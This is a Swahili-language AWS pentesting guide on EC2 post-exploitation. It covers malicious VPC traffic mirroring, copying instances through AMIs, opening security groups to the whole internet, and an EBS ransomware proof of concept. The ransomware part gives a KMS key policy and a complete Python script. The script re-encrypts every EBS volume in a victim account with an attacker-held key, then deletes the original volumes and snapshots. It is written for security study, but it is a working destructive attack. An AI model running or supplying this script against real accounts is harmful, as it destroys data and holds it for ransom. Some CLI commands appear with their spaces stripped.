Kioo cha VPC cha Nia mbaya -ec2:DescribeInstances, ec2:RunInstances, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:CreateTrafficMirrorTarget, ec2:CreateTrafficMirrorSession, ec2:CreateTrafficMirrorFilter, ec2:CreateTrafficMirrorFilterRule
Kioo cha trafiki cha VPC kinadondosha trafiki ya kuingia na kutoka kwa mifumo ya EC2 ndani ya VPC bila haja ya kusakinisha kitu kwenye mifumo yenyewe. Trafiki hii iliyodondoshwa kawaida ingetumwa kwa kitu kama mfumo wa kugundua udukuzi wa mtandao (IDS) kwa uchambuzi na ufuatiliaji.
Mshambuliaji anaweza kutumia hii kuikamata trafiki yote na kupata habari nyeti kutoka kwake:
Kawaida mifumo ina habari nyeti fulani. Kuna njia tofauti za kuingia (angalia mbinu za kufikia mamlaka ya EC2). Walakini, njia nyingine ya kuangalia inavyo ni kuunda AMI na kuendesha mfano mpya (hata kwenye akaunti yako mwenyewe):
# List instancesawsec2describe-images# create a new image for the instance-idawsec2create-image--instance-idi-0438b003d81cd7ec5--name"AWS Audit"--description"Export AMI"--regioneu-west-1# add key to AWSawsec2import-key-pair--key-name"AWS Audit"--public-key-materialfile://~/.ssh/id_rsa.pub--regioneu-west-1# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
# now you can check the instanceawsec2describe-instances--instance-idsi-0546910a0c18725a1# If needed : edit groupsawsec2modify-instance-attribute--instance-id"i-0546910a0c18725a1"--groups"sg-6d0d7f01"--regioneu-west-1# be a good guy, clean our instance to avoid any useless costawsec2stop-instances--instance-id"i-0546910a0c18725a1"--regioneu-west-1awsec2terminate-instances--instance-id"i-0546910a0c18725a1"--regioneu-west-1
Kupakia Picha ya EBS
Picha za EBS ni nakala rudufu za voli, ambazo kwa kawaida zitakuwa na taarifa nyeti, hivyo kuzikagua kunaweza kufichua taarifa hizi.
Ikiwa utapata voli bila picha ya nakala rudufu unaweza: Kuunda picha ya nakala rudufu na kufanya hatua zifuatazo au tu kuimount kwenye kifaa ndani ya akaunti:
Mshambuliaji anaweza kuita vituo vya API vya akaunti inayodhibitiwa na yeye. Cloudtrail itarekodi wito huu na mshambuliaji ataweza kuona data iliyochukuliwa katika kumbukumbu za Cloudtrail.
Kikundi cha Usalama Kilichofunguliwa
Unaweza kupata ufikiaji zaidi kwa huduma za mtandao kwa kufungua bandari kama hii:
awsec2authorize-security-group-ingress--group-id<sg-id>--protocoltcp--port80--cidr0.0.0.0/0# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC
Privesc to ECS
Inawezekana kuendesha kifaa cha EC2 na kusajili kuwa kutumiwa kuendesha visa vya ECS na kisha kuiba data za visa vya ECS.
Uthibitisho wa dhana sawa na onyesho la Ransomware lililoonyeshwa katika maelezo ya baada ya uchimbaji wa S3. KMS inapaswa kubadilishwa jina kuwa RMS kwa Huduma ya Usimamizi wa Ransomware kwa jinsi ilivyo rahisi kutumia kusimbua huduma mbalimbali za AWS kuitumia.
Kwanza kutoka kwenye akaunti ya AWS ya 'mshambuliaji', tengeneza ufunguo uliyoandaliwa na mteja katika KMS. Kwa mfano huu tutakuwa na AWS inisimamie data ya ufunguo, lakini katika hali halisi mhusika mwenye nia mbaya angehifadhi data ya ufunguo nje ya udhibiti wa AWS. Badilisha sera ya ufunguo kuruhusu akaunti yoyote ya AWS Principal kutumia ufunguo. Kwa sera hii ya ufunguo, jina la akaunti lilikuwa 'AttackSim' na sheria ya sera inayoruhusu ufikiaji wote inaitwa 'Nje ya Kusimbua'
Kanuni muhimu ya sera inahitaji yafuatayo kuwezeshwa ili kuruhusu uwezo wa kutumia kuiweka kama kifaa cha kusimbua kiasi cha EBS:
kms:CreateGrant
kms:Decrypt
kms:DescribeKey
kms:GenerateDataKeyWithoutPlainText
kms:ReEncrypt
Sasa tukiwa na ufikiaji wa kufikika kwa umma kwa funguo. Tunaweza kutumia akaunti ya 'mlemavu' ambayo ina baadhi ya EC2 instances zilizowashwa na volumes za EBS zisizo na kusimbwa zimeunganishwa. Volumes za EBS za akaunti ya 'mlemavu' ndizo tunazolenga kwa kusimbwa, shambulio hili linafanyika chini ya uvunjaji uliopendekezwa wa akaunti ya AWS yenye mamlaka ya juu.
Kama ilivyo kwa mfano wa ransomware wa S3. Shambulio hili litazalisha nakala za volumes za EBS zilizounganishwa kwa kutumia snapshots, kutumia funguo inayopatikana hadharani kutoka kwa akaunti ya 'mshambuliaji' kusimbua volumes mpya za EBS, kisha kutoa volumes za EBS za awali kutoka kwa EC2 instances na kuzifuta, na hatimaye kufuta snapshots zilizotumika kuunda volumes za EBS zilizosimbwa kwa upya.
Hii inasababisha kuwepo kwa volumes za EBS zilizosimbwa pekee zinazopatikana katika akaunti.
Pia ni muhimu kutambua, script ilisimamisha EC2 instances ili kutoa na kufuta volumes za EBS za awali. Volumes za awali zisizo na kusimbwa zimeondolewa sasa.
Kisha, rudia kwenye sera ya funguo katika akaunti ya 'mshambuliaji' na ondoa kanuni ya sera ya 'Kusimbua Nje' kutoka kwa sera ya funguo.
{"Version":"2012-10-17","Id":"key-consolepolicy-3","Statement": [{"Sid":"Enable IAM User Permissions","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:root"},"Action":"kms:*","Resource":"*"},{"Sid":"Allow access for Key Administrators","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:user/AttackSim"},"Action": ["kms:Create*","kms:Describe*","kms:Enable*","kms:List*","kms:Put*","kms:Update*","kms:Revoke*","kms:Disable*","kms:Get*","kms:Delete*","kms:TagResource","kms:UntagResource","kms:ScheduleKeyDeletion","kms:CancelKeyDeletion"],"Resource":"*"},{"Sid":"Allow use of the key","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:user/AttackSim"},"Action": ["kms:Encrypt","kms:Decrypt","kms:ReEncrypt*","kms:GenerateDataKey*","kms:DescribeKey"],"Resource":"*"},{"Sid":"Allow attachment of persistent resources","Effect":"Allow","Principal": {"AWS":"arn:aws:iam::[Your AWS Account Id]:user/AttackSim"},"Action": ["kms:CreateGrant","kms:ListGrants","kms:RevokeGrant"],"Resource":"*","Condition": {"Bool": {"kms:GrantIsForAWSResource":"true"}}}]}
Subiri kwa muda ili sera mpya ya ufunguo ipate kusambaa. Kisha rudia akaunti ya 'mlemavu' na jaribu kuambatisha moja ya diski za EBS zilizoandikwa upya. Utakuta unaweza kuambatisha diski.
Picha iliyowekwa 20231231174131
Picha iliyowekwa 20231231174258
Lakini unapojaribu kuanza tena kifaa cha EC2 na diski ya EBS iliyofungwa, itashindwa na kurudi kutoka hali ya 'kusubiri' hadi hali ya 'imesimamishwa' milele kwani diski ya EBS iliyofungwa haiwezi kufunguliwa kwa kutumia ufunguo kwani sera ya ufunguo haikubali tena.
Picha iliyowekwa 20231231174322
Picha iliyowekwa 20231231174352
Hii ni skripti ya python iliyotumika. Inachukua AWS creds kwa akaunti ya 'mlemavu' na thamani ya AWS ARN inayopatikana hadharani kwa ufunguo utakaotumika kwa kufungia. Skripti itafanya nakala zilizoandikwa upya za diski zote za EBS zilizopo zilizoambatishwa kwenye EC2 instances zote katika akaunti ya AWS iliyolengwa, kisha kusimamisha kila EC2 instance, kutoa diski za EBS za awali, kuzifuta, na hatimaye kufuta picha zote zilizotumiwa wakati wa mchakato. Hii itaacha diski za EBS zilizoandikwa upya pekee katika akaunti ya 'mlemavu' iliyolengwa. TUMIA SKRIPTI HII KATIKA MAZOEZI TU, NI YA KUHARIBU NA ITAFUTA DISKI ZA EBS ZA ASILI ZOTE. Unaweza kuzipata kwa kutumia ufunguo wa KMS uliotumiwa na kuzirudisha katika hali yao ya awali kupitia picha, lakini napenda kukufahamisha kuwa hii ni PoC ya ransomware mwishowe.
import boto3
import argparse
from botocore.exceptions import ClientError
def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes
def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids
def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']
volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids
def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")
def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")
def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")
def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)
def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed
def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()
def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)
if __name__ == "__main__":
main()
